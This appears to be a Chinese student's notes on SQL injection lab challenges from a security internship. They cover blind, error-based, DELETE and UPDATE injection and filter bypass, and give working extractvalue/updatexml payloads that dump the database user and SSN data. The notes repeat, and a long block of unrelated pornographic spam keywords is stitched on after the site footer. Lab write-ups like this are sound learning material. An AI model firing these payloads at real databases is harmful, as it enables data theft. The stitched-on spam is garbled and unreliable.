  • 相較于第一題,第三題調整成了每次只能輸出一行的機制,這種情情況下,使用LIMIT方法每一行逐步輸出就可以慢慢得到結果了,如果數據量過大手動注入很慢的話,可以考慮編寫腳本的方式來實現這些事情。
  • 第四題則是開了個新坑,整體注入的思路不變,但是錯誤注入得到所需信息的基本思路是不變的。只需要用一些函數來實現錯誤回顯。我會在后邊的模塊中進行匯總。
  • 第五題是一個新的思路——盲注,說人話就是對著ASCII表挨個字符硬試,這邊建議編寫腳本程序或者實用工具解決此類問題。
  • 第六題,不太明白有什么突出的特點。
  • 第七題是DELETE注入,這很危險,錯誤注入就行
  • 第八題添加了字符串過濾,有字符串過濾的情況下可以使用大小寫混淆的方式試圖繞過過濾
  • 第九題是UPDATE注入,它使得不應該被修改的數據跟著被篡改了。
  • 第十題直接查找的條件就是列名…這玩意兒最簡單的了。
  • 第十一題是ORDER BY而且無錯誤回顯emmmmmmmmmm 施工ing
  • 第十二題直接使用select方法查找了一些帶有<script>標簽的字符串,從而導致了類似xss注入的腳本攻擊。
  • LIKE模糊注入,等我找到工具之后再來
  • 準備ing
  • 一些特殊注入的記憶點總結

    關于報錯注入,這里用到了兩個方法,demo如下:

    'and (extractvalue(1,concat(0x7e,(select concat_ws(char(32,58,32),user(),database()))))) and '1'='1 ; 1 and updatexml(0,concat(0x01,(select concat_ws(char(32,58,32),`name`,'',ssn) from sqlol.ssn limit 0,1)),0)#

    單引號過濾的機制,但是無傷大雅,直接放上0或1,后邊的照常就能出結果了
    3. 相較于第一題,第三題調整成了每次只能輸出一行的機制,這種情情況下,使用LIMIT方法每一行逐步輸出就可以慢慢得到結果了,如果數據量過大手動注入很慢的話,可以考慮編寫腳本的方式來實現這些事情。
    4. 第四題則是開了個新坑,整體注入的思路不變,但是錯誤注入得到所需信息的基本思路是不變的。只需要用一些函數來實現錯誤回顯。我會在后邊的模塊中進行匯總。
    5. 第五題是一個新的思路——盲注,說人話就是對著ASCII表挨個字符硬試,這邊建議編寫腳本程序或者實用工具解決此類問題。
    6. 第六題,不太明白有什么突出的特點。
    7. 第七題是DELETE注入,這很危險,錯誤注入就行
    8. 第八題添加了字符串過濾,有字符串過濾的情況下可以使用大小寫混淆的方式試圖繞過過濾
    9. 第九題是UPDATE注入,它使得不應該被修改的數據跟著被篡改了。
    10. 第十題直接查找的條件就是列名…這玩意兒最簡單的了。
    11. 第十一題是ORDER BY而且無錯誤回顯emmmmmmmmmm 施工ing
    12. 第十二題直接使用select方法查找了一些帶有<script>標簽的字符串,從而導致了類似xss注入的腳本攻擊。
    13. LIKE模糊注入,等我找到工具之后再來
    14. 準備ing

    一些特殊注入的記憶點總結

    關于報錯注入,這里用到了兩個方法,demo如下:

    'and (extractvalue(1,concat(0x7e,(select concat_ws(char(32,58,32),user(),database()))))) and '1'='1 ; 1 and updatexml(0,concat(0x01,(select concat_ws(char(32,58,32),`name`,'',ssn) from sqlol.ssn limit 0,1)),0)#

    總結

    以上是生活随笔為你收集整理的ncist网络空间安全专业护网方向认知实习笔记2021.12 DAY7的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    久久国产成人午夜av影院潦草 | 色91av | 三三级黄色片之日韩 | 超碰97久久 | 国产精品无| 中文在线a在线 | 久久国产精品系列 | 亚洲精品国偷自产在线91正片 | 国产一区二区免费看 | 欧美精品中文字幕亚洲专区 | 98福利在线| 在线观看av黄色 | 国产一级性生活视频 | 91传媒激情理伦片 | 亚洲精品av中文字幕在线在线 | 久久久久日本精品一区二区三区 | 亚洲综合网 | 精品少妇一区二区三区在线 | 久久精品视频免费观看 | 97电影在线看视频 | 免费看国产曰批40分钟 | 久久视频免费在线 | 久久社区视频 | 麻豆传媒视频在线免费观看 | 成人av电影免费 | 欧美精品久久久久久久免费 | 日韩av片无码一区二区不卡电影 | 四虎影视久久久 | 国产在线v| 日本精品久久 | 51精品国自产在线 | 国产99在线免费 | 欧美日韩一级在线 | 日韩av在线不卡 | 色综合久久66 | 亚洲国产精品推荐 | 国产精品久久久久久99 | 国产精品久久久久久久久软件 | 国产一级二级三级视频 | 天天av在线播放 | 国产精品视频999 | 91免费视频网站在线观看 | 成人av免费播放 | 91色在线观看视频 | 国产精品一区二区三区四区在线观看 | 在线免费性生活片 | 欧美日韩久| 亚洲成a人片在线观看网站口工 | 精品国产一区二区三区噜噜噜 | 天天色天天色 | 一区二区视频电影在线观看 | 中文字幕在线观看视频一区二区三区 | 午夜色性片 | 欧美日韩99| 精品一区 在线 | 福利一区二区三区四区 | 天堂黄色片 | 波多野结衣电影一区二区三区 | 操夜夜操 | 人人爱在线视频 | av大全在线播放 | 亚洲黄色免费在线 | 美女网站在线看 | 精品伊人久久久 | 91一区二区三区在线观看 | 亚洲国产日韩av | 日韩色中色 | 成人超碰97| 美女视频黄免费 | 亚洲国产精品久久久久 | 久久精品99精品国产香蕉 | 国产不卡一二三区 | 天天干,天天射,天天操,天天摸 | 视频在线观看入口黄最新永久免费国产 | 91资源在线视频 | 黄色av三级在线 | 欧美成年性 | 国产高清视频在线免费观看 | av在线精品 | av电影免费观看 | 精品国产一区二区三区四区在线观看 | 在线播放av网址 | 91在线蜜桃臀 | 精品免费国产一区二区三区四区 | 91成人亚洲 | 欧产日产国产69 | 免费看黄在线网站 | 碰天天操天天 | 夜色在线资源 | 欧美日韩免费一区二区 | 久久草草热国产精品直播 | 日韩中文字幕一区 | 免费a视频在线 | 韩日视频在线 | 国产91精品久久久久久 | 国产精品久久免费看 | 不卡中文字幕在线 | 国产97色| 狠狠操影视 | 色偷偷网站视频 | 色偷偷888欧美精品久久久 | 久久激情日本aⅴ | 久久综合久久综合这里只有精品 | 午夜精品一区二区三区在线视频 | 色婷婷国产精品一区在线观看 | 午夜一级免费电影 | 91中文字幕网 | 免费在线观看日韩 | 天天干夜夜夜 | 久久国产二区 | 欧美日韩精品综合 | 免费看一级 | 99se视频在线观看 | 五月天婷婷在线视频 | 国产91全国探花系列在线播放 | 中文字幕在线观看网址 | 麻豆国产视频下载 | 91九色成人蝌蚪首页 | 中文字幕精品三级久久久 | 免费亚洲一区二区 | 日本久久中文字幕 | 超碰在线网 | 91成人免费在线视频 | 国产精品午夜在线观看 | 久久久久久久久久久精 | 亚洲日本黄色 | 麻豆视频www | 五月天开心 | 波多野结衣在线播放一区 | 午夜精品视频一区二区三区在线看 | 欧美一进一出抽搐大尺度视频 | 美国人与动物xxxx | 91九色九色| 黄色大片中国 | 国产精品一级在线 | 色九九影院 | 91探花国产综合在线精品 | 久久综合狠狠综合久久综合88 | 国产无遮挡又黄又爽在线观看 | 精品久久五月天 | 天无日天天操天天干 | 欧美日韩中文另类 | 国产一区二区高清不卡 | 国产成人高清 | 园产精品久久久久久久7电影 | 在线成人国产 | 99re久久精品国产 | 久久国产精品二国产精品中国洋人 | 久久在现视频 | 国产日韩亚洲 | www.伊人网 | 精品视频区 | 国产不卡精品 | 欧美在线视频一区二区 | 在线观看的av网站 | 婷婷丁香九月 | 日韩黄色免费电影 | 中文一区二区三区在线观看 | 国产在线 一区二区三区 | 九九激情视频 | .精品久久久麻豆国产精品 亚洲va欧美 | 一级免费看 | 国产在线观看高清视频 | 五月综合久久 | 91精品伦理 | 欧洲一区二区三区精品 | 激情av在线播放 | 国产一区二区在线免费播放 | 中文字幕国语官网在线视频 | 在线高清一区 | 久久精品一区二区 | a级免费观看 | 在线免费观看的av | 国产精品对白一区二区三区 | 狠狠干夜夜爽 | 99久久精品国产网站 | 天天干天天干天天干天天干天天干天天干 | 国产精品理论片在线播放 | 久久久国产一区二区 | 99国内精品久久久久久久 | 亚洲成人xxx | 午夜色大片在线观看 | 在线观看黄色免费视频 | 免费在线成人av | 日韩欧美一区二区三区免费观看 | 亚洲成免费 | 国产午夜av | 欧美一二三专区 | 99re视频在线观看 | 国产香蕉视频在线播放 | 中文字幕在线播放一区 | 91丨九色丨蝌蚪丰满 | 亚洲一片黄 | 缴情综合网五月天 | 欧洲一区二区在线观看 | 国产精品美女久久久久久网站 | 欧美美女视频在线观看 | 亚洲精品久久久久999中文字幕 | 色噜噜噜噜 | 一级淫片在线观看 | 国外成人在线视频网站 | av高清在线 | 天堂网在线视频 | 九九涩涩av台湾日本热热 | 国产97碰免费视频 | 国内精品在线看 | 日韩av成人在线观看 | 国产精品青草综合久久久久99 | 婷婷色婷婷 | 国产精品porn | 天天干天天操天天爱 | av网站地址 | 国产精品免费看久久久8精臀av | 亚洲国产中文字幕在线视频综合 | 日日躁夜夜躁xxxxaaaa | 91精品推荐 | 久久亚洲人 | 亚洲最新av在线网站 | 亚洲视屏在线播放 | 国产在线国偷精品产拍 | 色综合天天做天天爱 | 久久久久久久久国产 | 国产美女网| 麻豆一精品传二传媒短视频 | 亚洲黄色小说网 | 精品国产免费人成在线观看 | 中日韩欧美精彩视频 | 最近中文字幕免费视频 | 又紧又大又爽精品一区二区 | 色综合天天狠天天透天天伊人 | 欧美日韩国产一二三区 | 不卡视频在线看 | 国产精品一区二区三区四 | 久视频在线播放 | 在线视频中文字幕一区 | av在线一 | 久久综合色综合88 | 人人舔人人插 | 欧美大片www | 99久久电影 | 九九久| 欧美一区二区三区在线播放 | 日本h在线播放 | 亚洲综合色视频在线观看 | 欧美色图亚洲图片 | 九九免费在线观看视频 | 91精品网站| 婷婷丁香九月 | 久久免费黄色 | 久久免费视频99 | 人人搞人人搞 | 91九色视频在线观看 | 97自拍超碰 | 91在线日本 | 久久美女免费视频 | 久久99偷拍视频 | 国产香蕉97碰碰碰视频在线观看 | 激情文学综合丁香 | 最近免费中文字幕mv在线视频3 | 在线观看色视频 | 国产美女免费视频 | 麻花豆传媒mv在线观看 | 中文字幕国产精品一区二区 | 2018亚洲男人天堂 | 日韩午夜小视频 | 综合激情网 | 日韩在线视频看看 | 婷婷 中文字幕 | 日本久久91 | 超碰人人91| 麻豆国产精品一区二区三区 | 国产在线2020 | 国产一区二区观看 | 特片网久久 | 色搞搞| av黄色在线播放 | 久久这里精品视频 | 黄色亚洲在线 | av午夜电影| av女优中文字幕在线观看 | 日韩乱理 | av久久在线 | 中文字幕在线播放一区二区 | 日韩精品中文字幕一区二区 | 91精品一区二区三区蜜臀 | 久草在线免 | 国产精品久久视频 | 亚洲乱亚洲乱妇 | 国产看片 色 | 日本成址在线观看 | 天堂成人在线 | 男女精品久久 | 天堂在线免费视频 | 成人日韩av | 国产手机在线播放 | 色视频成人在线观看免 | 九九热免费精品视频 | 96av在线视频 | 91看片网址 | 国产精品精品久久久 | www.色婷婷.com | 波多野结衣视频网址 | 免费观看不卡av | 日韩中文字幕网站 | 欧美亚洲国产日韩 | 成年人视频在线免费播放 | 九九免费在线看完整版 | 国产中文字幕在线看 | 久久成人欧美 | 91在线porny国产在线看 | 麻豆视频国产精品 | 天天干天天玩天天操 | 中文字幕在线视频国产 | 中文字幕视频免费观看 | 99久久999久久久精玫瑰 | 2019精品手机国产品在线 | 欧美精品久久久久久久免费 | 99色在线播放 | 中文乱幕日产无线码1区 | 肉色欧美久久久久久久免费看 | 国产不卡毛片 | 欧美黄色免费 | 欧美日韩后| 欧美少妇xxx | 国产视频一二区 | 久草综合在线 | 麻豆国产视频下载 | 免费福利片 | 一区二区亚洲精品 | 9ⅰ精品久久久久久久久中文字幕 | 国产 一区二区三区 在线 | av资源免费在线观看 | 91精品久久久久久综合五月天 | 午夜精品一区二区三区在线播放 | 国产日韩欧美在线一区 | 亚洲精品99久久久久久 | 久久久久久久久久久久久影院 | 欧美日韩免费网站 | a级国产乱理论片在线观看 伊人宗合网 | 国产麻豆精品一区二区 | 精品国产一区二区三区男人吃奶 | 精品 一区 在线 | 91热爆视频 | 日本久久视频 | 日韩高清在线一区二区三区 | 97超级碰碰碰碰久久久久 | 日韩一区二区三免费高清在线观看 | 亚洲精品在线电影 | 天天色天天搞 | 国产一区网址 | 干干夜夜 | 午夜少妇av | 开心激情婷婷 | 国产高清视频免费最新在线 | av看片在线观看 | 麻豆果冻剧传媒在线播放 | 国产色网站 | www中文在线 | 国产综合在线视频 | 国产在线视频在线观看 | 97激情影院| 国产精品成人久久久久 | 开心激情五月婷婷 | 在线看成人av | 午夜精品婷婷 | 欧美色图一区 | 偷拍久久久 | 伊人五月在线 | 欧美九九视频 | 99精品一区二区 | 91激情视频在线 | 特级毛片aaa | 精品在线视频观看 | 探花视频在线版播放免费观看 | 成人97人人超碰人人99 | 99热最新精品| 天天五月天色 | 中文字幕av影院 | 免费观看久久 | 日韩激情视频在线观看 | 久久亚洲综合国产精品99麻豆的功能介绍 | 天天爱天天 | 久久精品男人的天堂 | 久久久久视 | 国产成人久久久久 | 成人在线黄色电影 | 一区三区在线欧 | 国产视频在线播放 | 韩日在线一区 | a色视频| 日女人电影 | 999热线在线观看 | 久九视频| 成人午夜毛片 | 99久久精品久久久久久清纯 | av 一区二区三区四区 | 亚洲国产精久久久久久久 | .国产精品成人自产拍在线观看6 | 99色视频在线 | 日韩欧美一区二区在线观看 | 亚洲天天综合网 | 国产青春久久久国产毛片 | 精品久久久久久亚洲综合网站 | 视频国产区 | 一区二区三区 中文字幕 | 婷婷六月色 | 九九99| 免费观看全黄做爰大片国产 | 久久国精品 | 亚洲一区二区三区毛片 | 久久久久99精品国产片 | 久久久www | 天海翼一区二区三区免费 | 91在线影院| 黄色成人av网址 | 天天操天天干天天操天天干 | 精品伦理一区二区三区 | 精品一区二区三区香蕉蜜桃 | 欧美成人黄色 | 黄网站色视频免费观看 | 91亚洲精品乱码久久久久久蜜桃 | 水蜜桃亚洲一二三四在线 | 国内小视频在线观看 | 在线免费观看黄色 | 久久免费精品一区二区三区 | 婷婷精品国产欧美精品亚洲人人爽 | 久久这里只精品 | 久久久久免费视频 | 激情五月五月婷婷 | 韩国在线一区二区 | 国产日韩精品一区二区 | 天天综合天天综合 | 色婷婷狠狠五月综合天色拍 | 国产不卡免费av | 色中文字幕在线观看 | 成人免费视频网站在线观看 | 人人爽爽人人 | 永久免费的啪啪网站免费观看浪潮 | 日本女人在线观看 | av免费网站 | 中文字幕免费高清在线 | 伊人婷婷久久 | 日本最新中文字幕 | 国产精品久久在线 | 国产视频精品久久 | 久久激情五月激情 | 日批在线看 | 婷婷视频在线观看 | 日韩一区正在播放 | 国产精品女| 国产免费亚洲 | 午夜久久成人 | 亚洲黄色app | 国产美女视频免费 | 色视频国产直接看 | 中中文字幕av在线 | 99综合久久 | 色婷婷国产精品 | 久久精品视频4 | 高清中文字幕av | 久久理论片 | 天天操夜夜操国产精品 | 婷婷精品进入 | 91在线免费观看国产 | 97精品国产手机 | 国产精品美女久久久久久久久久久 | 国产视频黄 | 成人午夜精品 | 麻豆91精品视频 | 操操操影院 | 欧美极品少妇xxxxⅹ欧美极品少妇xxxx亚洲精品 | 五月婷丁香| www.91国产| 麻豆视频国产精品 | 热99在线视频 | 亚洲精品在 | 粉嫩av一区二区三区四区 | 日本最新一区二区三区 | 欧美极品xxxxx | 中文在线字幕免费观 | 亚洲精品综合一区二区 | 日一日操一操 | 在线视频观看你懂的 | 天天操天天操天天操天天操天天操天天操 | 欧美在线视频免费 | 在线观看视频你懂的 | 亚洲天天看 | 日韩欧美视频在线免费观看 | 最近中文字幕第一页 | 欧美日韩观看 | 久久免费视频8 | 免费视频网 | 欧美成人h版 | 亚洲视频 视频在线 | 91九色精品国产 | av不卡网站 | 久草在线免费资源站 | 在线观看免费视频你懂的 | 日日摸日日添夜夜爽97 | 91国内在线| 久草免费福利在线观看 | 国产高清免费观看 | 亚洲黄色免费在线 | 成人免费看黄 | 国产短视频在线播放 | 99视频在线观看免费 | 国产区精品区 | 麻豆成人小视频 | 久久综合之合合综合久久 | 午夜婷婷在线观看 | 狠狠色丁香婷婷综合视频 | 三上悠亚一区二区在线观看 | 国产黄色在线观看 | 91自拍视频在线观看 | 天天干,夜夜爽 | 激情综合中文娱乐网 | 97精品国自产拍在线观看 | 国产二区电影 | 中字幕视频在线永久在线观看免费 | 五月天开心 | 五月婷婷中文字幕 | 日韩免费一区二区三区 | 啪啪资源 | 成人h电影在线观看 | 欧美一级黄色片 | 国产日本三级 | 亚洲欧美日韩精品一区二区 | 国产91精品久久久久久 | 中文字幕在线观 | 亚洲一区久久久 | 中文字幕亚洲在线观看 | av+在线播放在线播放 | 日韩在线观看你懂的 | 久草精品在线播放 | 99综合影院在线 | 日本黄色免费大片 | 免费观看v片在线观看 | 久久影视中文字幕 | 中文伊人| 国产精彩在线视频 | 久久国产一区二区 | 久久97久久| 97香蕉超级碰碰久久免费软件 | 看片的网址 | 在线v片| 久久69精品久久久久久久电影好 | 久久国产精品影视 | www.xxxx变态.com| 国产日韩欧美在线看 | 亚洲国产精品一区二区久久,亚洲午夜 | 亚洲在线高清 | 国产精品久久久久久吹潮天美传媒 | 一区二区久久久久 | 在线免费观看视频一区二区三区 | 日韩网站一区二区 | 色天天 | 国产成人久久精品亚洲 | 久久久久久久久久久久久国产精品 | 丝袜美女视频网站 | 91精品在线播放 | 久热香蕉视频 | 99久久精品免费看国产 | 欧美成人中文字幕 | 在线91色 | 日韩区欧美久久久无人区 | 久久免费黄色大片 | 午夜在线日韩 | 国产一区二三区好的 | 中文字幕在线日 | 高清av中文在线字幕观看1 | 高清av网 | 国产无套视频 | 人人搞人人干 | 日韩特级片 | 黄色av一区二区三区 | 91av原创 | 日本爱爱免费视频 | 在线成人高清电影 | 91pony九色丨交换 | 成人av电影免费 | 插久久 | 一区二区三区免费网站 | 国产视频18 | 成人小视频在线播放 | 国产综合片 | 香蕉视频色 | 色欧美视频 | 久久精品9| 又色又爽又激情的59视频 | 999在线视频 | 日韩免费不卡av | 国产精品久久久区三区天天噜 | 一区三区视频在线观看 | 国产一区电影在线观看 | 欧美资源在线观看 | 中文字幕区 | 一 级 黄 色 片免费看的 | 日韩欧美一区二区三区视频 | 国产精品久久久久9999吃药 | 夜夜狠狠| 久久成人亚洲欧美电影 | 五月婷婷六月丁香 | 高清有码中文字幕 | 亚洲激情小视频 | 久久国产电影院 | 亚洲,播放| 久久国产免费视频 | 欧美日韩不卡一区二区 | 日韩在线视频国产 | 激情视频综合网 | 手机看片午夜 | 99精品久久只有精品 | 97精品国自产拍在线观看 | 国产精品18久久久久久久网站 | 超碰公开在线 | 欧美少妇xxx | av免费网站 | 69av国产 | 狠狠的操狠狠的干 | 在线精品视频免费播放 | 在线播放精品一区二区三区 | 成人动漫精品一区二区 | 久久无码精品一区二区三区 | 成人黄色一级视频 | 国产一区二区三区免费观看视频 | 亚洲欧美国内爽妇网 | 亚洲欧美日本一区二区三区 | 国产精品国产三级国产aⅴ无密码 | 最近日本韩国中文字幕 | 国产视频精品视频 | www.69xx | 色噜噜日韩精品欧美一区二区 | 中国一级片在线观看 | 人人爽人人爽人人 | 婷婷av色综合 | 日韩精品一区二区三区视频播放 | 国产精品白虎 | 亚洲欧美乱综合图片区小说区 | www.成人精品 | 精品日韩中文字幕 | 欧美国产精品久久久久久免费 | 99久久超碰中文字幕伊人 | 久久久精品小视频 | 国产黄色成人av | 精品久久久久久久久久久院品网 | 久久呀 | 国产精品久久久久久久久久免费看 | 国产亚州精品视频 | 国产一区在线不卡 | 久热国产视频 | 日韩国产精品久久久久久亚洲 | 国产美女免费视频 | 欧美一级免费 | 国产亚洲精品久久久久久久久久久久 | 精品国产精品国产偷麻豆 | 婷婷社区五月天 | 日韩高清不卡一区二区三区 | 欧美日韩在线精品 | 免费福利片| 亚洲国产大片 | 97色se| 国产99久久久欧美黑人 | 日韩在线影视 | 狠狠狠色丁香婷婷综合久久五月 | 国产一区二区成人 | 97视频在线免费播放 | 九九热在线观看视频 | 免费在线观看日韩视频 | 99精品视频免费在线观看 | 日韩狠狠操 | 精品一区在线看 | www视频在线观看 | 不卡的av电影 | 久久99久久99精品免观看粉嫩 | 在线精品观看国产 | 日b黄色片 | 四虎精品成人免费网站 | 毛片一级免费一级 | 欧美日韩高清一区二区三区 | 久久久久久久久久久久久影院 | 黄色软件在线观看免费 | 国产男女无遮挡猛进猛出在线观看 | 一区二区三区www | 五月天综合激情 | 久久国产日韩 | 九九热只有这里有精品 | 国产福利中文字幕 | 久久不卡电影 | 亚洲精品久久久久58 | 去看片| 一区二区三区高清在线观看 | 人人干狠狠操 | 中文字幕在线观看网 | 国产97在线视频 | 麻豆免费在线视频 | 欧美一级日韩免费不卡 | 91精品久久久久久综合乱菊 | 一性一交视频 | 国产精品久久久视频 | 综合久久网站 | 日韩黄色软件 | 欧美性一级观看 | 欧美一级片免费观看 | 99久久99久国产黄毛片 | 99热官网| 日日操天天操夜夜操 | 欧美一级免费片 | 久久久久久久久久电影 | 操久| 亚洲激情五月 | 色综合久久中文综合久久牛 | 久久久www免费电影网 | 在线看小早川怜子av | 久久国产精品成人免费浪潮 | 在线观看 国产 | ww视频在线观看 | 日韩在线小视频 | 在线观看精品一区 | 91色国产在线 | 97超碰免费在线观看 | 在线观看精品视频 | 久久久久久久久影视 | 久草免费在线视频 | 黄色一区二区在线观看 | 日韩,中文字幕 | 亚洲午夜精品久久久久久久久久久久 | 狠狠干2018| 免费大片黄在线 | 精品久久久久久久久久岛国gif | se婷婷 | 国产区在线 | 国产精品自拍在线 | 成人a视频在线观看 | 超碰人在线 | 久9在线| 日韩精品最新在线观看 | 狠狠干成人综合网 | 成人黄色毛片 | 丁香六月伊人 | 亚洲精品玖玖玖av在线看 | 久久中文欧美 | 国产精品视频地址 | 天无日天天操天天干 | 韩日电影在线 | 在线观看欧美成人 | 亚洲一级黄色大片 | 国产精品露脸在线 | 国产精品久久在线 | 日本精品视频免费 | 首页国产精品 | 午夜视频亚洲 | 国产精品高潮呻吟久久av无 | 欧美日韩亚洲第一 | 久久99久久99精品免观看软件 | 国内久久久久久 | 亚洲精品在线观 | 久久久精品国产一区二区电影四季 | 日日摸日日添日日躁av | 超碰日韩 | 欧美激情精品久久久久久免费印度 | 国产91精品久久久久久 | 欧美va天堂va视频va在线 | 91久久久国产精品 | 婷婷丁香国产 | 日韩视频免费观看高清 | 亚洲综合在线五月天 | 久久99久国产精品黄毛片入口 | 久久99精品国产 | 激情视频亚洲 | 波多野结衣在线观看视频 | 成人午夜影院 | 天天射天天干天天操 | 免费成人在线视频网站 | 国产区精品在线观看 | 中文字幕综合在线 | 亚洲精品乱码久久久久久久久久 | 国产精品无av码在线观看 | 国产一区二区午夜 | 精品久久久久久国产 | 久久国产剧场电影 | 日韩精品在线观看视频 | 97在线观看免费视频 | 视频在线观看一区 | 午夜精品久久久久久久爽 | 国产精品精品久久久久久 | 久久精品亚洲 | 欧美日高清视频 | 丁香婷婷综合激情五月色 | 正在播放 久久 | 91精品国产99久久久久 | 国产色拍拍拍拍在线精品 | 日韩在线观看中文 | 国产在线精品一区二区不卡了 | 日韩中文字幕视频在线观看 | 在线观看日本韩国电影 | 麻豆久久一区二区 | 中文字幕a∨在线乱码免费看 | 91在线视频观看免费 | 国产成a人亚洲精v品在线观看 | 最新超碰在线 | 亚洲欧洲精品一区二区 | 91免费观看| 日韩欧美一区二区在线播放 | www国产亚洲 | 91av亚洲 | 日日夜夜草 | 91福利社区在线观看 | 久久全国免费视频 | 日韩av播放在线 | 中文字幕高清免费日韩视频在线 | 国产不卡一区二区视频 | 欧美激情第一区 | 国产精品福利无圣光在线一区 | 国产精品6999成人免费视频 | 免费观看性生活大片3 | 99精品视频免费在线观看 | 五月婷婷丁香网 | 97国产大学生情侣酒店的特点 | 国模一区二区三区四区 | 日韩在线观看精品 | 国产专区在线看 | 最近最新mv字幕免费观看 | 久久手机免费观看 | 精品理论片 | 欧美激情视频一二区 | 婷婷综合电影 | 91香蕉亚洲精品 | 免费毛片一区二区三区久久久 | 中文字幕 影院 | 婷婷丁香激情 | 久久艹国产视频 | 国产精品欧美激情在线观看 | 日韩精品一区二区三区在线播放 | 蜜桃av综合网 | 日产中文字幕 | 中文字幕 二区 | www.777奇米| 在线亚洲激情 | 最近中文字幕大全 | 香蕉在线观看视频 | 国产一区久久久 | 久久精品永久免费 | 国产 一区二区三区 在线 | 在线观看免费中文字幕 | 国产精品成人在线 | 久久久网| 婷婷激情小说网 | 五月婷婷欧美 | 久久久久久久久久久久久久电影 | 日韩精品一区二区三区丰满 | 最近中文字幕视频网 | 99久久国产免费,99久久国产免费大片 | 亚洲精品一区二区三区新线路 | 久久首页 | 在线黄色观看 | 夜夜躁日日躁狠狠久久av | 国产aa精品| 国产一区二区精品 | 亚洲激情一区二区三区 | 丁香六月五月婷婷 | 中文字幕在线观看免费 | 国产又粗又猛又爽 | 久久精品国产一区二区 | 国产亚洲精品成人av久久影院 | 亚洲男男gaygay无套同网址 | 色婷婷免费视频 | 色99中文字幕 | 99精品视频免费在线观看 | av久久久| 亚洲精品乱码久久久久久蜜桃91 | 国产 欧美 在线 | 国产视频一区二区三区在线 | 国产一区二区精品久久 | 国产成本人视频在线观看 | 高清精品视频 | 国产一卡二卡在线 | 最新真实国产在线视频 | av 一区二区三区四区 | 亚洲综合在线一区二区三区 | 国产尤物在线 | 国产一区二区三区午夜 | 91精品啪在线观看国产线免费 | 在线观看中文字幕网站 | 国产一级a毛片视频爆浆 | 亚洲国产天堂av | 天天操天操 | 久久免费视频在线观看6 | 黄色中文字幕在线 | 亚洲区精品视频 | 97在线观视频免费观看 | 亚洲日本欧美 | 成人免费看视频 | 久久婷亚洲五月一区天天躁 | 国产精品色在线 | 91麻豆福利 | 亚洲精品视频在线 | 成在线播放 | 免费成人av在线看 | 国产一区二区三区视频在线 | 国产中文| 97操操操 | 天天色天天上天天操 | 黄色毛片视频免费观看中文 | 久久久国产一区二区三区 | 福利在线看片 | 2020天天干天天操 | 免费污片 | 日韩免费看片 | av噜噜噜在线播放 | 91精品久久久久久久久久入口 | av成人黄色| 国产成人精品999在线观看 | 亚洲a免费| 亚洲欧美色婷婷 | 亚洲精品视频在线观看免费视频 | 综合色在线观看 | 91av亚洲| 中文av在线播放 | 国产在线精品区 | 在线观看福利网站 | 久久国语露脸国产精品电影 | 欧美日韩高清一区二区三区 | 久久影视中文字幕 | 欧美午夜视频在线 | 香蕉在线视频观看 | 精品一区 在线 | 久久久蜜桃一区二区 | 在线一二三四区 | 日韩一区二区三区不卡 | 日韩精品在线看 | 91精品国产一区二区在线观看 | 午夜视频在线观看一区 | 99精品国产兔费观看久久99 | 色多多视频在线 | 亚洲一区美女视频在线观看免费 | 日韩精品久久久免费观看夜色 | 国产精品理论片在线观看 | 亚洲精品国产精品国自产在线 | 不卡中文字幕av | 成人午夜黄色影院 | 成人久久久久久久久 | 国产九九在线 | 精久久久久 | 天天干天天操av | 日韩免费观看一区二区 | 97精品国产 | 中文字幕成人一区 | 国产成人久久av977小说 | 月丁香婷婷| 99色亚洲 | 一区二区三区视频网站 | 亚洲国产免费 | 国产裸体永久免费视频网站 | 免费h精品视频在线播放 | 午夜av在线免费 | 热99在线视频 | 狠狠天天| 欧美亚洲一级片 | 一本一本久久a久久精品综合小说 | 亚洲视频免费在线观看 | 亚洲精品在线一区二区 | 成人免费视频网站在线观看 | 天天艹天天 | 亚洲欧美国产日韩在线观看 | 操操操av| 国内精品久久久久久 | 99国产精品久久久久老师 | 日韩成人免费观看 | 日韩天堂在线观看 | 一区二区三区不卡在线 | 在线观看av国产 | 久久久久成人精品 | 久久不卡日韩美女 | 五月婷婷黄色网 | www.色午夜| 国产二级视频 | 久久久官网 | 1区2区视频 | 永久免费看av | 日本久久久精品视频 | 亚洲黄色小说网址 | 国产成人精品一区二区三区福利 | 国产精品欧美久久久久久 | 狠狠操天天干 | 色婷婷狠狠18 | 蜜臀av在线一区二区三区 | 69绿帽绿奴3pvideos | 看全黄大色黄大片 | 激情综合亚洲 | 欧美色精品天天在线观看视频 | 黄色av电影 | 最新av在线网址 | 亚洲国产高清视频 | 亚洲国产成人久久综合 | 免费91麻豆精品国产自产在线观看 | 国产美女在线精品免费观看 | 国产精品麻豆91 | 五月激情视频 |